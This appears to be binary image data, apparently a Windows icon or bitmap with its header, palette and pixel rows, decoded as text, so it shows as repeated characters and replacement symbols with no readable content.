999999999999999kkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999kkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999kkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999kkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999kkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999kkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkXkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999EkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkk�������������   ����������������������������    ��������������������������      ?������������������������       ������������������������        �����������������������        ����������������������         ����������������������          ?���������������������          ��������������������           ��������������������            �������������������            �������������������            ������������������             ������������������              �����������������              ?�����������������              ����������������               ����������������               ����������������                ���������������                ?���������������                ���������������                ��������������                 ��������������                 ��������������                  �������������                  ?�������������                  �������������                  �������������                  ������������                   ������������                   ������������                    ������������                    �����������                    ?�����������                    �����������                    �����������                    ����������                     ����������                     ����������                      ����������                      ���������                      ���������                      ?���������                      ���������                      ���������                      ���������                      ��������                       ��������                       ��������                       ��������                        ��������                        �������                        �������                        ?�������                        ?�������                        �������                        �������                        �������                        �������                        ������                         ������                         ������                         ������                         ������                          ������                          ������                          �����                          �����                          �����                          ?�����                          ?�����                          �����                          �����                          �����                          �����                          �����                          �����                          �����                          �����                          ����                           ����                           ����                           ����                           ����                           ����                           ����                           ����                           ����                           ����                            ����                            ����                            ����                            ����                            ����                            ����                            ����                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ���                            ����                            ����                            ����                            ����                            ����                            ����                           ����                           ����                           ����                           ����                           ����                           ����                           ����                           ����                           �����                          �����                          �����                          �����                          �����                          �����                          �����                          �����                          �����                          �����                          ?�����                          ?�����                          ?�����                          �����                          �����                          ������                          ������                         ������                         ������                         ������                         ������                         �������                        �������                        �������                        �������                        �������                        �������                        ?�������                        ?�������                        �������                        ��������                        ��������                       ��������                       ��������                       ���������                      ���������                      ���������                      ���������                      ���������                      ?���������                      ���������                      ����������                      ���������                      ���������                      ����������                     ����������                     ����������                     ����������                     ����������                      ���������                      ���������                      ���������                      ����������                     ����������                     ����������                     ����������                     ����������                     ����������                     ����������                   ?������������                  ?������������                  ?������������                  ?������������                � ?������������               � ?�������������              � ?�������������              �    �����������              ?���������������              ����������������             �����������������            �����������������            ?�����������������            ������������������           �������������������          ����    ������������          ����?��������������         �����?���������������        �����?���������������        ������?����������������      ������?����������������      �������?�����������������    �������?������������������  ��������?�  ����������������������������� ������������������������������ ������������������������������ ������������������������������ ������������������������������ ������������������������������ ������������������������������ ������������������������������ ������������������������������  ����������������������������� ����������������������������� ����������������������������� ����������������������������� ����������������������������� ����������������������������� ����������������������������� �����������������������������   �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������(   �             H                 ��� ��� ��� A�� y�� BBB ��� ��� ��� ��� �� ��� ��� ��� ��� ��� ��� �� �� yyy ��� �� ��� DV ��� !.6 ��� ��� `�� ��� c�� \�� ��� $�� ��� ���  ', ��� ^�� Y�� ��� ��� ��� �� ��� ��� ��� ddf ��� ��� [[] ��� ��� :G ��� "Re �� ^^` %%(   # "#% ���  �� �� %�� �� �� �� Zt ��� ��� ��� ��� �� !!$ �� ��� ��� �� ��� ��� ��� e� Pe ��� ��� ��� ��� ��� AO k� '�� ��� X�� �� ��� ��� ��� YY[ ��� ��� ��� Bxy ��  y� Y^b ��� ��� ���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1T++++?Gmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm3++++++++++++++++++++++!T(mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm)++++++++++++++++++++++++++++++Fmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm!+++++++++++++++++++++++++++++++++++++Pmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmF+++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmG+++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++++++++++++++++++++++++++++++]mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm@+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Pmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm@+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmWB+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++++++++++?'+++++++++++++++++++++++++++++++++++"mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++++++OP+++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++++!)+++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++'LN+++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmG++++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++&6++++++++++++++++++++++++?mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++F++++++++++++++++++++++++"mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm0+++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++N+++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++@Hmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++?+++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++&L?++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++*+++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++"V++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++N U/9 ++++++++++++++++++++ mmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++# ;;;;;;;+++++++++++++++++++mmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++ ;;;;;;;;;A+++++++++++++++++++mmmmmmmmmmmmmmmmmmmm+++++++++++++++++++;;;;;;;;;;; +++++++++++++++++++mmmmmmmmmmmmmmmmmmmm+++++++++++++++++++;;;;;;;;;;;;++++++++++++++++++mmmmmmmmmmmmmmmmmm++++++++++++++++++;;;;;;;;;;;;+++++++++++++++++++mmmmmmmmmmmmmmmmmm)+++++++++++++++++++ ;;;;;;;;;;;;;;++++++++++++++++++mmmmmmmmmmmmmmmmmm++++++++++++++++++';;;;;;;;;;;;;;E++++++++++++++++++Bmmmmmmmmmmmmmmmm++++++++++++++++++MJ;;;;;;;;;;;;;;; ++++++++++++++++++mmmmmmmmmmmmmmmm++++++++++++++++++Q;;;;;;;;;;;;;;;;++++++++++++++++++mmmmmmmmmmmmmmmm++++++++++++++++++;;;;;;;;;;;;;;;;Je+++++++++++++++++mmmmmmmmmmmmmmmm++++++++++++++++++G;;;;;;;;;;;;;;;;;;++++++++++++++++++mmmmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;;;;;;;;.#++++++++++++++++++mmmmmmmmmmmmmm%++++++++++++++++++;;;;;;;;;;;;;;;;;;;;A+++++++++++++++++mmmmmmmmmmmmmm0++++++++++++++++++;;;;;;;;;;;;;;;;;;;;+++++++++++++++++mmmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;+++++++++++++++++mmmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;+++++++++++++++++mmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;;;++++++++++++++++++	mmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;;;++++++++++++++++++mmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;;;;;+++++++++++++++++mmmmmmmmmmmmm@+++++++++++++++++ :;;;;;;;;;;;;;;;;;;;;;;;;;;:M+++++++++++++++++mmmmmmmmmmmmm++++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;;;;;;;'+++++++++++++++++*mmmmmmmmmmmmm++++++++++++++++++4;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; &+++++++++++++++++mmmmmmmmmmmmm++++++++++++++++++	;;;;;;;;;;;;;;;;;;;;;;;;;;;;b+++++++++++++++++mmmmmmmmmmmmm++++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;;;;;;;;+++++++++++++++++mmmmmmmmmmmmmA+++++++++++++++++,;;;;;;;;;;;;; :;;;;;;;;;;;;;;;+++++++++++++++++*mmmmmmmmmmmmm[+++++++++++++++++M;;;;;;;;;;;;;,;;;;;;;;;;;;;;;;+++++++++++++++++mmmmmmmmmmmmm+++++++++++++++++2;;;;;;;;;;;;;U :;;;;;;;;;;;;;;;; @+++++++++++++++++0mmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;;;;;;;;++++++++++++++++++mmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;;; :;;;;;;;;;;;;;;;;Q++++++++++++++++++mmmmmmmmmmmmmd+++++++++++++++++ ;;;;;;;;;;;;c;;;;;;;;;;;;;;;;J W+++++++++++++++++mmmmmmmmmmmmm+++++++++++++++++B;;;;;;;;;;;; k;;;;;;;;;;;;;;;;+++++++++++++++++mmmmmmmmmmmmmm++++++++++++++++++;;;;;;;;;;;; J;;;;;;;;;;;;;;;; +++++++++++++++++mmmmmmmmmmmmmm++++++++++++++++++-;;;;;;;;;;;; ;;;;;;;;;;;;;;;; F++++++++++++++++++mmmmmmmmmmmmmmm+++++++++++++++++;;;;;;;;;;;; ;;;;;;;;;;;;;;;; 3++++++++++++++++++)mmmmmmmmmmmmmmm++++++++++++++++++a;;;;;;;;;;;; ;;;;;;;;;;;;;;; ++++++++++++++++++"mmmmmmmmmmmmmmm3++++++++++++++++++;;;;;;;;;;;;;;;;;;;;;;;;;;;?+++++++++++++++++mmmmmmmmmmmmmmmm++++++++++++++++++j;;;;;;;;;;;;;;;;;;;;;;;;;;;;++++++++++++++++++mmmmmmmmmmmmmmmmm++++++++++++++++++;;;;;;;;;;: ;;;;;;;;;;;;;;;;;++++++++++++++++++mmmmmmmmmmmmmmmmm++++++++++++++++++;;;;;;;;;9 ;;;;;;;;;;;;;;;;*++++++++++++++++++mmmmmmmmmmmmmmmmm+++++++++++++++++++;;;;;;; :;;;;;;;;;;;;;;;2++++++++++++++++++mmmmmmmmmmmmmmmmmm++++++++++++++++++ <;;;J;;;;;;;;;;;;;;;;;;;+++++++++++++++++++Emmmmmmmmmmmmmmmmmmm-+++++++++++++++++++ `;;;;;;;;;;;;;;;;;;"!++++++++++++++++++@mmmmmmmmmmmmmmmmmmm+++++++++++++++++++	;;;;;;;;;;;;;;;;;;+++++++++++++++++++mmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++;;;;;;;;;;;;;;;;;E++++++++++++++++++++mmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++ ;;;;;;;;;;;;;;;;;i7SS>++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++?;;;;;;;;;;;;;;;;;;;;>++++++++++++++++mmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++.;;;;;;;;;;;;;;;;;;;>+++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++";;;;;;;;;;;;;;;;;;;>+++++++++++++++mmmmmmmmmmmmmmmmmmmmmmmmm)+++++++++++++++++++++";;;;;;;;;;;h>>>8++++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++H;;;;;;;;;;;++++;;;I+++++++++Bmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++;;;;;;;;;;;++++;;;I+++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmV++++++++++++++++++++++@(;;;;;;;;;;;++++;;;I++++++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++?:;;;;;;;;CCCCY;;;
CC8+++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++f;;;;;;;;;;;;;;;;;;;D++++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++R;;;;;;;;;;;;;;;;;;;D+++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++R;;;;;;;;;;;;;;;;;;;D++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++XB+++Z$;;;;;;;;;;;;;;;D++mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm!+++++++++++++++++++++++++++	++++++++++
;;;;;;;;;;;;;;;S>^ mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++++ @++++++++++++
;;;;;;;;;;;;;;;;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm?+++++++++++++++++++++++++++++++)O1?+++++++++++++++
;;;;>>>>5J;;;;;;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmL?+++++++++++++++++++++++++++++++++++A+++++++++++++++++++++
;;;;K+++;;;;;;;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;;;;K+++;;;;;;;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;;;;K+++;;;;;;;;;;;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm!+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++g>>>>Y$;;;;;;;;;;;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++;;;;;;;;;;;;;;;;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++;;;JJ;;;;;///2;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm?++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++555;;;;;;/mmm=;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++B6 ;;;;;;/mmm=;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmA+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++m ;;;;;;/mmm=;;;;mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++++++mm    `    mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++++++++++AOmmmmmmmmmmm`;;;mmm;;;; mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm+++++++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmm`;;;mmm;;;; mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm++++++++++++++++++++++++++++++++++++++++++++++mmmmmmmmmmmmmmm`;;;mmm;;;; mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmEA+++++++++++++++++++++++++++++++++++++++++6Hmmmmmmmmmmmmm=   9    4    mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm	